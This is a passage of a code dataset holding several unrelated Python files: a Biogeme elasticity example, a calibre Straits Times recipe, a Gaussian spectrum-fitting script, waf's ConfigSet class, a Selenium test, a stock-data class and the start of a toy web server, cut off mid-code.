Must be consistent with estimation results.\nTimePT_scaled = TimePT / 200\nTimeCar_scaled = TimeCar / 200\nMarginalCostPT_scaled = MarginalCostPT / 10\nCostCarCHF_scaled = CostCarCHF / 10\ndistance_km_scaled = distance_km / 5\nmale = Gender == 1\nfemale = Gender == 2\nunreportedGender = Gender == -1\nfulltime = OccupStat == 1\nnotfulltime = OccupStat != 1\n\n# Definition of utility functions:\nV_PT = (\n ASC_PT\n + BETA_TIME_FULLTIME * TimePT_scaled * fulltime\n + BETA_TIME_OTHER * TimePT_scaled * notfulltime\n + BETA_COST * MarginalCostPT_scaled\n)\nV_CAR = (\n ASC_CAR\n + BETA_TIME_FULLTIME * TimeCar_scaled * fulltime\n + BETA_TIME_OTHER * TimeCar_scaled * notfulltime\n + BETA_COST * CostCarCHF_scaled\n)\nV_SM = (\n ASC_SM\n + BETA_DIST_MALE * distance_km_scaled * male\n + BETA_DIST_FEMALE * distance_km_scaled * female\n + BETA_DIST_UNREPORTED * distance_km_scaled * unreportedGender\n)\n\n# Associate utility functions with the numbering of alternatives\nV = {0: V_PT, 1: V_CAR, 2: V_SM}\n\n# Definition of the nests:\n# 1: nests parameter\n# 2: list of alternatives\n\nMU_NOCAR = Beta('MU_NOCAR', 1.0, 1.0, None, 0)\nCAR_NEST = 1.0, [1]\nNO_CAR_NEST = MU_NOCAR, [0, 2]\nnests = CAR_NEST, NO_CAR_NEST\n\n# The choice model is a nested logit\nprob_pt = models.nested(V, None, nests, 0)\nprob_car = models.nested(V, None, nests, 1)\nprob_sm = models.nested(V, None, nests, 2)\n\n# We investigate a scenario where the distance increases by one kilometer.\ndelta_dist = 1.0\ndistance_km_scaled_after = (distance_km + delta_dist) / 5\n\n# Utility of the slow mode whem the distance increases by 1 kilometer.\nV_SM_after = (\n ASC_SM\n + BETA_DIST_MALE * distance_km_scaled_after * male\n + BETA_DIST_FEMALE * distance_km_scaled_after * female\n + BETA_DIST_UNREPORTED * distance_km_scaled_after * unreportedGender\n)\n\n# Associate utility functions with the numbering of alternatives\nV_after = {0: V_PT, 1: V_CAR, 2: V_SM_after}\n\n# Definition of the nests:\n# 1: nests parameter\n# 2: list of alternatives\n\nprob_sm_after = models.nested(V_after, None, nests, 2)\n\ndirect_elas_sm_dist = (\n (prob_sm_after - prob_sm) * distance_km / (prob_sm * delta_dist)\n)\n\nsimulate = {\n 'weight': normalizedWeight,\n 'Prob. slow modes': prob_sm,\n 'direct_elas_sm_dist': direct_elas_sm_dist,\n}\n\nbiogeme = bio.BIOGEME(database, simulate)\nbiogeme.modelName = '05nestedElasticitiesConfidenceIntervals'\n\n# Read the estimation results from the file\nresults = res.bioResults(pickleFile='01nestedEstimation.pickle')\n\n# simulatedValues is a Panda dataframe with the same number of rows as\n# the database, and as many columns as formulas to\n# simulate.\nsimulatedValues = biogeme.simulate(results.getBetaValues())\n\n# We calculate the elasticities\n\nsimulatedValues['Weighted prob. slow modes'] = (\n simulatedValues['weight'] * simulatedValues['Prob. slow modes']\n)\n\ndenominator_sm = simulatedValues['Weighted prob. slow modes'].sum()\n\ndirect_elas_sm_dist = (\n simulatedValues['Weighted prob. 
slow modes']\n * simulatedValues['direct_elas_sm_dist']\n / denominator_sm\n).sum()\nprint(\n f'Aggregate direct arc elasticity of slow modes wrt distance: '\n f'{direct_elas_sm_dist:.7f}'\n)\n\nprint('Calculating confidence interval...')\n\n# Calculate confidence intervals\nb = results.getBetasForSensitivityAnalysis(biogeme.freeBetaNames, size=100)\n\n# Returns data frame containing, for each simulated value, the left\n# and right bounds of the confidence interval calculated by\n# simulation.\nleft, right = biogeme.confidenceIntervals(b, 0.9)\n\nleft['Weighted prob. slow modes'] = left['weight'] * left['Prob. slow modes']\nright['Weighted prob. slow modes'] = (\n right['weight'] * right['Prob. slow modes']\n)\ndenominator_left = left['Weighted prob. slow modes'].sum()\ndenominator_right = right['Weighted prob. slow modes'].sum()\n\n# Build an interval object for the denominator\ndenominator_interval = ia.interval[(denominator_left, denominator_right)]\n\n# Build a list of interval objects, one for each disaggregate elasticity\nelas_interval = [\n ia.interval([l, r])\n for l, r in zip(left['direct_elas_sm_dist'], right['direct_elas_sm_dist'])\n]\n\n# Build a list of interval objects, one for each term of the numerator\nnumerator_interval = [\n ia.interval([l, r])\n for l, r in zip(\n left['Weighted prob. slow modes'], right['Weighted prob. slow modes']\n )\n]\n\n# Build a list of interval objects, one for each term of the sum\nterms_of_the_sum_interval = [\n e * wp / denominator_interval\n for e, wp in zip(elas_interval, numerator_interval)\n]\n\n# The interval package apparently does not provide a tool to sum a\n# list of intervals. We do it manually. Note that the object interval\n# contains a list of ranges (to allow the modeling of disconnected\n# intervals). 
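\n# [Editor's note: illustrative aside, not part of the original record; a minimal\n# standalone use of the same pyinterval accessors, relying on the\n# 'import interval as ia' above:]\ndemo_a = ia.interval[(1.0, 2.0)]\ndemo_b = ia.interval[(0.5, 1.5)]\ndemo_left = sum(x[0].inf for x in (demo_a, demo_b))   # 1.5\ndemo_right = sum(x[0].sup for x in (demo_a, demo_b))  # 3.5\n\n# intervals). 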
The first of these ranges is x[0], and we access the inf\n# and sup values of this range.\nsum_interval_left = sum(x[0].inf for x in terms_of_the_sum_interval)\nsum_interval_right = sum(x[0].sup for x in terms_of_the_sum_interval)\n\nprint(f'[{sum_interval_left},{sum_interval_right}]')\n","sub_path":"examples/indicators/05nestedElasticitiesConfidenceIntervals.py","file_name":"05nestedElasticitiesConfidenceIntervals.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270444202","text":"\r\n__license__ = 'GPL v3'\r\n__copyright__ = ''\r\n'''\r\nwww.straitstimes.com\r\n'''\r\n\r\nimport re\r\nfrom calibre.web.feeds.recipes import BasicNewsRecipe\r\n\r\n\r\nclass StraitsTimes(BasicNewsRecipe):\r\n title = 'The Straits Times'\r\n __author__ = ''\r\n description = 'Singapore newspaper'\r\n oldest_article = 2\r\n max_articles_per_feed = 100\r\n no_stylesheets = True\r\n use_embedded_content = False\r\n encoding = 'utf-8'\r\n publisher = 'Singapore Press Holdings Ltd.'\r\n category = 'news, politics, singapore, asia'\r\n language = 'en_SG'\r\n\r\n conversion_options = {\r\n 'comments': description, 'tags': category, 'language': language, 'publisher': publisher\r\n }\r\n\r\n preprocess_regexps = [\r\n (re.compile(\r\n r'',\r\n re.IGNORECASE | re.DOTALL),\r\n lambda m:''),\r\n (re.compile(r'', re.IGNORECASE | re.DOTALL),\r\n lambda m: ''),\r\n ]\r\n \r\n headline_reg_exp = 'headline node-title' # Headline\r\n img_reg_exp = 'image' \t\t # Main Image\r\n body_reg_exp = 'odd\\sfield-item' # Article Body\r\n subheadline_reg_exp = 'node-subheadline' # Sub-headline\r\n related_reg_exp = '^.*related_story.*$' # Related Stories\r\n\r\n keep_only_tags = [\r\n dict(name='h1', attrs={'class': re.compile(headline_reg_exp, re.IGNORECASE)}) \r\n ,dict(name='figure', attrs={'itemprop': re.compile(img_reg_exp, re.IGNORECASE)})\r\n ,dict(name='div', attrs={'class': 'story-postdate'}) # Publish time\r\n ,dict(name='h2', attrs={'class': re.compile(subheadline_reg_exp, re.IGNORECASE)})\r\n ,dict(name='div', attrs={'class': re.compile(body_reg_exp, re.IGNORECASE)}) # Article Body\r\n \r\n ]\r\n \r\n remove_tags = [\r\n dict(name='div', attrs={'class': re.compile(related_reg_exp, re.IGNORECASE)})\r\n ]\r\n \r\n remove_tags_after = dict(name='div', attrs={'class': 'hr_thin'})\r\n \r\n\r\n feeds = [\r\n (u'Top of the News' , u'http://www.straitstimes.com/print/top-of-the-news/rss.xml')\r\n ,(u'World' , u'http://www.straitstimes.com/print/world/rss.xml')\r\n ,(u'Home' , u'http://www.straitstimes.com/print/home/rss.xml')\r\n ,(u'Business' , u'http://www.straitstimes.com/print/business/rss.xml')\r\n ,(u'Invest' , u'http://www.straitstimes.com/print/invest/rss.xml')\r\n ,(u'Life' , u'http://www.straitstimes.com/print/life/rss.xml')\r\n ,(u'Digital' , u'http://www.straitstimes.com/print/digital/rss.xml')\r\n ,(u'Opinion' , u'http://www.straitstimes.com/print/opinion/rss.xml')\r\n ,(u'Forum' , u'http://www.straitstimes.com/print/forum/rss.xml')\r\n ,(u'Big Picture' , u'http://www.straitstimes.com/print/big-picture/rss.xml')\r\n ,(u'Insight' , u'http://www.straitstimes.com/print/insight/rss.xml')\r\n ,(u'Science' , u'http://www.straitstimes.com/print/science/rss.xml')\r\n ,(u'Education' , u'http://www.straitstimes.com/print/education/rss.xml')\r\n ,(u'Mind & Body' , u'http://www.straitstimes.com/print/mind-body/rss.xml')\r\n ,(u'Community' , u'http://www.straitstimes.com/print/community/rss.xml')\r\n ,(u'Sport' , 
u'http://www.straitstimes.com/print/sport/rss.xml')\r\n \r\n\r\n ]\r\n\r\n def preprocess_html(self, soup):\r\n for img in soup.findAll('img', srcset=True):\r\n img['src'] = img['srcset'].partition(' ')[0]\r\n img['srcset'] = ''\r\n return soup\r\n\r\n\r\n","sub_path":"straits_times.py","file_name":"straits_times.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501638532","text":"\nfrom inspect import Parameter\nimport matplotlib.mlab as mlab\nfrom re import error\nfrom matplotlib import patches\n# from matplotlib.pyplot import plt\nimport pylab as plt\nfrom numpy import array\nimport numpy as np\nimport pylab as pl\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm\n\n\noriPath = \"Task1-samples\\\\Task1-ReleaseV1.0\\\\energy_2020-09-30.csv\"\nglobal max_value,nomrmal\nmax_value = 40000\nnormal = 511\nglobal gx_rate,gy_rate\n# gx_rate = 1\n# gy_rate = 1\ngx_rate = 100\ngy_rate = 1600\n\n\ndef get_data(lines):\n '''\n 读取数据\n '''\n sizeArry = []\n for line in lines:\n line = line.replace('\\n',\"\")\n line = line.replace(',','')\n line = int(float(line))\n sizeArry.append(line)\n return array(sizeArry)\n\ndef gaussian(data):\n\n x = np.array(data) \n mu =np.mean(x) #计算均值 \n sigma =np.std(x) \n num_bins = 30 #直方图柱子的数量 \n n, bins, patches = plt.hist(x, num_bins,density=1, alpha=0.75) \n #直方图函数,x为x轴的值,normed=1表示为概率密度,即和为一,绿色方块,色深参数0.5.返回n个概率,直方块左边线的x值,及各个方块对象 \n y = norm.pdf(bins, mu, sigma)#拟合一条最佳正态分布曲线y \n\n plt.grid(True)\n plt.plot(bins, y, 'r--') #绘制y的曲线 \n plt.xlabel('values') #绘制x轴 \n plt.ylabel('Probability') #绘制y轴 \n plt.title('Histogram : $\\mu$=' + str(round(mu,2)) + ' $\\sigma=$'+str(round(sigma,2))) #中文标题 u'xxx' \n #plt.subplots_adjust(left=0.15)#左边距 \n\ndef gaussian_singletrue(x,*param):\n '''\n 真实事件的高斯峰\n '''\n return param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef gaussian_1(x,*param):\n return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))\n\ndef gaussian_2(x,*param):\n '''二元高斯函数拟合过程\n\n '''\n return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))+\\\n param[1]*np.exp(-np.power(x - param[3], 2.) 
/ (2 * np.power(param[5], 2.)))\n\ndef gaussian_3(x,a1,a2,a3,m1,m2,m3,s1,s2,s3): # 三元高斯拟合函数 \n \n return a1*np.exp(-((x-m1)/s1)**2)+a2*np.exp(-((x-m2)/s2)**2)+a3*np.exp(-((x-m3)/s3)**2)\n\ndef draw_hist(lenths):\n\n # 绘制直方图\n bins1 = np.linspace(min(lenths),max(lenths),200)\n pl.figure(\"能谱直方图\")\n n1, bins1, patches1 = pl.hist(lenths,bins1)\n pl.xlabel('Energy')\n pl.ylabel('Counts')\n pl.title('Energy spectrum histogram')\n\n\n # 能谱归一化\n n12 = n1.tolist()\n frequent_index = n12.index(max(n12)) \n data = lenths*511/(0.5*(bins1[frequent_index]+bins1[frequent_index+1]))\n bins2 = np.linspace(min(data),max(data),200)\n pl.figure(\"归一化能谱直方图\")\n n2, bins2, patches2 = pl.hist(data,bins2)\n pl.xlabel('Energy')\n pl.ylabel('Counts')\n pl.title('Normalized energy spectrum histogram')\n\n\n\n\n # 绘制高斯拟合图\n # bins比n多一个数\n # bins = np.delete(bins,-1) # 方法一:去除列表最后面的一个数\n guass_x = []\n guass_x = np.array(guass_x)\n guass_y = n2\n for i in range(len(bins2)-1): #方法二:bins需要取矩形两端端点的均值\n temp = 0.5*(bins2[i]+bins2[i+1])\n guass_x = np.append(guass_x,temp)\n popt,pcov = curve_fit(gaussian_2,guass_x/gx_rate,guass_y/gy_rate,p0=[3,4,3,6,1,1],maxfev = 140000)\n\n plt.figure(\"高斯拟合图\")\n plt.plot(guass_x,guass_y,'b*:',label='data')\n plt.plot(guass_x,gaussian_2(guass_x/gx_rate,*popt)*gy_rate,'r',label='fit')\n plt.legend()\n plt.show()\n print(\"高斯拟合的参数:\",*popt)\n\n # 计算能量分辨率\n \n \n\n # 循环计算列表横坐标中的拟合值是否等于半高度\n '''\n global half_h_w1, half_h_w2,E_max\n half_h_w1, half_h_w2 = 0,0\n for x in x_point: \n if(x<256&int(gaussian_2(x,*popt))==int(0.5*high)):\n half_h_w1 = x\n if(x>256&int(gaussian_2(x,*popt))==int(0.5*high)):\n half_h_w2 = x\n E_max = 0\n if(int(gaussian_2(x,*popt)>E_max)):\n E_max = x\n half_h_w = half_h_w2-half_h_w1\n '''\n\n # 将大于半高度的横坐标保存下来,并追加列表,计算列表中首尾两项的差值\n '''双峰融合版\n global half_h_w_list\n half_h_w_list = []\n high = max(gaussian_2(guass_x/gx_rate,*popt)*gy_rate)\n for x in guass_x: \n if(int(gaussian_2(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n half_h_w_list = np.append(half_h_w_list,x)\n E_max = 511\n \n half_h_w = max(half_h_w_list)-min(half_h_w_list)\n eta = half_h_w/E_max\n print(\"能量分辨率为:\",eta)\n '''\n global half_h_w_list\n half_h_w_list = []\n high = max(gaussian_singletrue(guass_x/gx_rate,*popt)*gy_rate)\n for x in guass_x: \n if(int(gaussian_singletrue(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n half_h_w_list = np.append(half_h_w_list,x)\n E_max = 511\n \n half_h_w = max(half_h_w_list)-min(half_h_w_list)\n eta = half_h_w/E_max\n print(\"能量分辨率为:\",eta)\n \n ''' \n high = max(gaussian_2(guass_x,*popt))\n \n for x in x_point:\n ''' \n \n\n \n# 首先打开文件从文件中读取数据\nf = open(oriPath,encoding=\"utf-8\")\nLenths = get_data(f.readlines()) \ndraw_hist(Lenths)\n\n\n","sub_path":"Task1-samples/Task1-ReleaseV1.0/gaussian_hist_xls.py","file_name":"gaussian_hist_xls.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68333241","text":"#!/usr/bin/env python\n# Thomas Nagy, 2005-2018 (ita)\n\"\"\"\n\nConfigSet: a special dict\n\nThe values put in :py:class:`ConfigSet` must be serializable (dicts, lists, strings)\n\"\"\"\nimport copy\nimport os\nimport re\n\nfrom waflib import Logs\nfrom waflib import Utils\n\nre_imp = re.compile(r\"^(#)*?([^#=]*?)\\ =\\ (.*?)$\", re.M)\n\n\nclass ConfigSet:\n \"\"\"\n A copy-on-write dict with human-readable serialized format. The serialization format\n is human-readable (python-like) and performed by using eval() and repr().\n For high performance prefer pickle. 
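\n\n    [Editor's note: illustrative aside, not part of the original record.]\n    A derive/detach round-trip using only methods defined in this class::\n\n        env = ConfigSet()\n        env.append_value('CFLAGS', ['-O2'])\n        child = env.derive()   # copy-on-write view of env\n        child.detach()         # deep-copies, so later child edits stop leaking\n\n    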
Do not store functions as they are not serializable.\n\n The values can be accessed by attributes or by keys::\n\n from waflib.ConfigSet import ConfigSet\n env = ConfigSet()\n env.FOO = 'test'\n env['FOO'] = 'test'\n \"\"\"\n\n __slots__ = (\"table\", \"parent\")\n\n def __init__(self, filename=None):\n self.table = {}\n \"\"\"\n\t\tInternal dict holding the object values\n\t\t\"\"\"\n # self.parent = None\n\n if filename:\n self.load(filename)\n\n def __contains__(self, key):\n \"\"\"\n Enables the *in* syntax::\n\n if 'foo' in env:\n print(env['foo'])\n \"\"\"\n if key in self.table:\n return True\n try:\n return self.parent.__contains__(key)\n except AttributeError:\n return False # parent may not exist\n\n def keys(self):\n \"\"\"Dict interface\"\"\"\n keys = set()\n cur = self\n while cur:\n keys.update(cur.table.keys())\n cur = getattr(cur, \"parent\", None)\n keys = list(keys)\n keys.sort()\n return keys\n\n def __iter__(self):\n return iter(self.keys())\n\n def __str__(self):\n \"\"\"Text representation of the ConfigSet (for debugging purposes)\"\"\"\n return \"\\n\".join(\n [\"{!r} {!r}\".format(x, self.__getitem__(x)) for x in self.keys()]\n )\n\n def __getitem__(self, key):\n \"\"\"\n Dictionary interface: get value from key::\n\n def configure(conf):\n conf.env['foo'] = {}\n print(env['foo'])\n \"\"\"\n try:\n while 1:\n x = self.table.get(key)\n if not x is None:\n return x\n self = self.parent\n except AttributeError:\n return []\n\n def __setitem__(self, key, value):\n \"\"\"\n Dictionary interface: set value from key\n \"\"\"\n self.table[key] = value\n\n def __delitem__(self, key):\n \"\"\"\n Dictionary interface: mark the value as missing\n \"\"\"\n self[key] = []\n\n def __getattr__(self, name):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n conf.env.value\n conf.env['value']\n \"\"\"\n if name in self.__slots__:\n return object.__getattribute__(self, name)\n else:\n return self[name]\n\n def __setattr__(self, name, value):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n conf.env.value = x\n env['value'] = x\n \"\"\"\n if name in self.__slots__:\n object.__setattr__(self, name, value)\n else:\n self[name] = value\n\n def __delattr__(self, name):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n del env.value\n del env['value']\n \"\"\"\n if name in self.__slots__:\n object.__delattr__(self, name)\n else:\n del self[name]\n\n def derive(self):\n \"\"\"\n Returns a new ConfigSet deriving from self. The copy returned\n will be a shallow copy::\n\n from waflib.ConfigSet import ConfigSet\n env = ConfigSet()\n env.append_value('CFLAGS', ['-O2'])\n child = env.derive()\n child.CFLAGS.append('test') # warning! 
this will modify 'env'\n child.CFLAGS = ['-O3'] # new list, ok\n child.append_value('CFLAGS', ['-O3']) # ok\n\n Use :py:func:`ConfigSet.detach` to detach the child from the parent.\n \"\"\"\n newenv = ConfigSet()\n newenv.parent = self\n return newenv\n\n def detach(self):\n \"\"\"\n Detaches this instance from its parent (if present)\n\n Modifying the parent :py:class:`ConfigSet` will not change the current object\n Modifying this :py:class:`ConfigSet` will not modify the parent one.\n \"\"\"\n tbl = self.get_merged_dict()\n try:\n delattr(self, \"parent\")\n except AttributeError:\n pass\n else:\n keys = tbl.keys()\n for x in keys:\n tbl[x] = copy.deepcopy(tbl[x])\n self.table = tbl\n return self\n\n def get_flat(self, key):\n \"\"\"\n Returns a value as a string. If the input is a list, the value returned is space-separated.\n\n :param key: key to use\n :type key: string\n \"\"\"\n s = self[key]\n if isinstance(s, str):\n return s\n return \" \".join(s)\n\n def _get_list_value_for_modification(self, key):\n \"\"\"\n Returns a list value for further modification.\n\n The list may be modified inplace and there is no need to do this afterwards::\n\n self.table[var] = value\n \"\"\"\n try:\n value = self.table[key]\n except KeyError:\n try:\n value = self.parent[key]\n except AttributeError:\n value = []\n else:\n if isinstance(value, list):\n # force a copy\n value = value[:]\n else:\n value = [value]\n self.table[key] = value\n else:\n if not isinstance(value, list):\n self.table[key] = value = [value]\n return value\n\n def append_value(self, var, val):\n \"\"\"\n Appends a value to the specified config key::\n\n def build(bld):\n bld.env.append_value('CFLAGS', ['-O2'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(\n val, str\n ): # if there were string everywhere we could optimize this\n val = [val]\n current_value = self._get_list_value_for_modification(var)\n current_value.extend(val)\n\n def prepend_value(self, var, val):\n \"\"\"\n Prepends a value to the specified item::\n\n def configure(conf):\n conf.env.prepend_value('CFLAGS', ['-O2'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(val, str):\n val = [val]\n self.table[var] = val + self._get_list_value_for_modification(var)\n\n def append_unique(self, var, val):\n \"\"\"\n Appends a value to the specified item only if it's not already present::\n\n def build(bld):\n bld.env.append_unique('CFLAGS', ['-O2', '-g'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(val, str):\n val = [val]\n current_value = self._get_list_value_for_modification(var)\n\n for x in val:\n if x not in current_value:\n current_value.append(x)\n\n def get_merged_dict(self):\n \"\"\"\n Computes the merged dictionary from the fusion of self and all its parent\n\n :rtype: a ConfigSet object\n \"\"\"\n table_list = []\n env = self\n while 1:\n table_list.insert(0, env.table)\n try:\n env = env.parent\n except AttributeError:\n break\n merged_table = {}\n for table in table_list:\n merged_table.update(table)\n return merged_table\n\n def store(self, filename):\n \"\"\"\n Serializes the :py:class:`ConfigSet` data to a file. 
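\n\n        [Editor's note: illustrative aside, not part of the original record.]\n        A store/load round-trip, assuming a writable path::\n\n            env = ConfigSet()\n            env.FOO = 'bar'\n            env.store('/tmp/cache.py')  # written as human-readable KEY = value lines\n            env2 = ConfigSet()\n            env2.load('/tmp/cache.py')\n            assert env2.FOO == 'bar'\n\n        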
See :py:meth:`ConfigSet.load` for reading such files.\n\n :param filename: file to use\n :type filename: string\n \"\"\"\n try:\n os.makedirs(os.path.split(filename)[0])\n except OSError:\n pass\n\n buf = []\n merged_table = self.get_merged_dict()\n keys = list(merged_table.keys())\n keys.sort()\n\n try:\n fun = ascii\n except NameError:\n fun = repr\n\n for k in keys:\n if k != \"undo_stack\":\n buf.append(\"{} = {}\\n\".format(k, fun(merged_table[k])))\n Utils.writef(filename, \"\".join(buf))\n\n def load(self, filename):\n \"\"\"\n Restores contents from a file (current values are not cleared). Files are written using :py:meth:`ConfigSet.store`.\n\n :param filename: file to use\n :type filename: string\n \"\"\"\n tbl = self.table\n code = Utils.readf(filename, m=\"rU\")\n for m in re_imp.finditer(code):\n g = m.group\n tbl[g(2)] = eval(g(3))\n Logs.debug(\"env: %s\", self.table)\n\n def update(self, d):\n \"\"\"\n Dictionary interface: replace values with the ones from another dict\n\n :param d: object to use the value from\n :type d: dict-like object\n \"\"\"\n self.table.update(d)\n\n def stash(self):\n \"\"\"\n Stores the object state to provide transactionality semantics::\n\n env = ConfigSet()\n env.stash()\n try:\n env.append_value('CFLAGS', '-O3')\n call_some_method(env)\n finally:\n env.revert()\n\n The history is kept in a stack, and is lost during the serialization by :py:meth:`ConfigSet.store`\n \"\"\"\n orig = self.table\n tbl = self.table = self.table.copy()\n for x in tbl.keys():\n tbl[x] = copy.deepcopy(tbl[x])\n self.undo_stack = self.undo_stack + [orig]\n\n def commit(self):\n \"\"\"\n Commits transactional changes. See :py:meth:`ConfigSet.stash`\n \"\"\"\n self.undo_stack.pop(-1)\n\n def revert(self):\n \"\"\"\n Reverts the object to a previous state. See :py:meth:`ConfigSet.stash`\n \"\"\"\n self.table = self.undo_stack.pop(-1)\n","sub_path":"docs/.mywaflib/waflib/ConfigSet.py","file_name":"ConfigSet.py","file_ext":"py","file_size_in_byte":10597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332412317","text":"\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n# init driver\ndriver = webdriver.Chrome(executable_path='/Users/mun/python-selenium-automation/chromedriver_auto')\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\ndriver.get('https://www.amazon.com/')\nsearch_field=driver.find_element(By. ID,'twotabsearchtextbox').send_keys('Table')\n\nsearch_icon=driver.find_element(By.ID,'nav-search-submit-button')\nsearch_icon.click()\n\ndriver.find_element(By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nactual_result=driver.find_element (By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nexpected_result= '\"Table\"'\nassert expected_result == actual_result, f'Excepcted {expected_result}, but got {actual_result}'\n","sub_path":"amazon_script.py","file_name":"amazon_script.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189171448","text":"class learningData(object):\r\n ''' The object of data. This object will be composed\r\n from an array of stocks and dates. It will consist\r\n of both input data (xs) and output data (ys). '''\r\n def __init__(self):\r\n ''' The data is originally two empty array. The first array will be\r\n two dimensional input array called x that is m x n. 
The second\r\n array called y is the output array that is m x 1. The number of\r\n stocks is denoted by m and the number of dates used for learning\r\n is denoted by n. All notation is to be consistant with the\r\n Coursera Machine Learning course as much as possible.'''\r\n self.X = []\r\n self.y = []\r\n self.m = 0\r\n self.n = 0\r\n\r\n def construct(self, stocks, dates):\r\n ''' This method constructs the data arrays. The inputs are an array\r\n of m stocks and an array of dates. The first element of dates\r\n is a character string to tell the referenced date such as\r\n '1/1/1980'. The second element is an array of n-1 integers\r\n telling the trading days to use to populate the input array.\r\n The final value is the integer value of the future date.\r\n An input value of ['1/1/1980',[50, 100, 150], 50] means\r\n we are using '1/1/1980' as our reference date along with the\r\n dates 50 trading days, 100 trading days and 150 trading days\r\n in the past for a total of 4 input values i.e. n = 4. From\r\n these values we are looking to anticipate the stock value\r\n 50 days in the future. \r\n\r\n The value of m for the data is expected to be m but not all stocks\r\n go back as far in time. If 1/1/1980 is the reference date and\r\n gs only went public in 1999 this stock will be left out of the\r\n Data object.\r\n\r\n '''\r\n self.n = len(dates[1]) + 1\r\n self.m = 0\r\n from stock import Stock\r\n from read_stock import convert_date\r\n referenceDate = convert_date(dates[0])\r\n num_stocks = len(stocks)\r\n print (referenceDate)\r\n self.m = 0\r\n for i in range(0, num_stocks):\r\n elements = len(stocks[i].dates) # This is the number of entries in stocks\r\n firstDayAvailable = stocks[i].dates[elements-1]\r\n firstDayNeeded = referenceDate - max(dates[1]) # How far back I need to go\r\n if (firstDayNeeded > firstDayAvailable): \r\n self.m += 1\r\n # Find index of referenceDate. 
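\r\n            # [Editor's note: illustrative aside, not part of the original record.\r\n            # dates are stored newest-first, so the scan below walks forward until it\r\n            # passes referenceDate, then steps back one slot. E.g. with dates\r\n            # [105, 102, 100, 97, 95] and reference 99 the while-loop stops at index 3\r\n            # (97) and the step back lands on index 2 (100), the first trading day on\r\n            # or after the reference.]\r\n            # Find index of referenceDate. 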
refererenceDate might not be a trading\r\n # day in which case we will start with index of first trading day\r\n # after referenceDay\r\n iDay = 0\r\n while (stocks[i].dates[iDay] >= referenceDate):\r\n iDay += 1\r\n if (stocks[i].dates[iDay] < referenceDate):\r\n iDay -= 1\r\n stockDays = []\r\n stockDays.append(iDay)\r\n # Construct an array of indicies of values to constuct from\r\n for iMark in range(0, len(dates[1])):\r\n stockDays.append(iDay + dates[1][iMark])\r\n # Now go through array of indicies and get the trading values of those days\r\n tempValues = []\r\n referenceValue = stocks[i].values[iDay] # All values for this stock are divided by this\r\n for iMark in range(0, len(stockDays)):\r\n # divide stock value by value on reference date \r\n adjustedValue = stocks[i].values[stockDays[iMark]]/referenceValue\r\n tempValues.append(adjustedValue)\r\n self.X.append(tempValues)\r\n # Now get the future value and append it to self.y\r\n futureDay = iDay - dates[2]\r\n adjustedValue = stocks[i].values[futureDay]/referenceValue\r\n self.y.append(adjustedValue)\r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"learningData.py","file_name":"learningData.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21864824","text":"# coding: utf-8\nimport random\n\nfrom web004.models import User, Message\nfrom web004.util import log\n\n\ndef template(name):\n path = 'templates/' + name\n with open(path, 'r', encoding='utf-8') as f:\n r = f.read()\n return r\n\n\ndef random_str():\n # 生成随机的字符\n seed = 'asdfjqeruoprtkjgfddzxcvnnmlpoidjiruqdfjjka'\n s = ''\n for i in range(16):\n index = random.randint(1, len(seed) - 1)\n s += seed[index]\n return s\n\n\ndef current_user(request):\n # cookies = request.cookies\n # session_id = cookies['user']\n # username = session[session_id]\n # return username\n session_id = request.cookies.get('user', '')\n username = session.get(session_id, '【游客】')\n return username\n\n\ndef response_with_header(headers, code=200):\n header_dict = {\n 200: 'HTTP/1.1 200 OK\\r\\n',\n 301: 'HTTP/1.1 301 Permanently Moved\\r\\n',\n 302: 'HTTP/1.1 302 Temporarily Moved\\r\\n',\n }\n header = header_dict[code]\n # 这样写的原因是''.join()要比字符串的拼接效率高\n # for k, v in headers:\n # header += '{}: {}\\r\\n'.format(k, v)\n header += ''.join(['{}: {}\\r\\n'.format(k, v) for k, v in headers.items()])\n return header\n\n\ndef route_static(request):\n filename = request.query.get('file', 'doge.gif')\n path = 'static/' + filename\n # with open(path, 'rb', encoding='utf-8') as f:\n # ValueError: binary mode doesn't take an encoding argument\n # 二进制数据不应该指定编码格式\n with open(path, 'rb') as f:\n body = f.read()\n log('图片:', body)\n header = b'HTTP/1.1 200 OK\\r\\nContent: image/gif\\r\\n'\n r = header + b'\\r\\n' + body\n return r\n\n\ndef route_index(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n body = template('example.html')\n username = current_user(request)\n body = body.replace('{{username}}', username)\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_register(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n if request.method == 'POST':\n form = 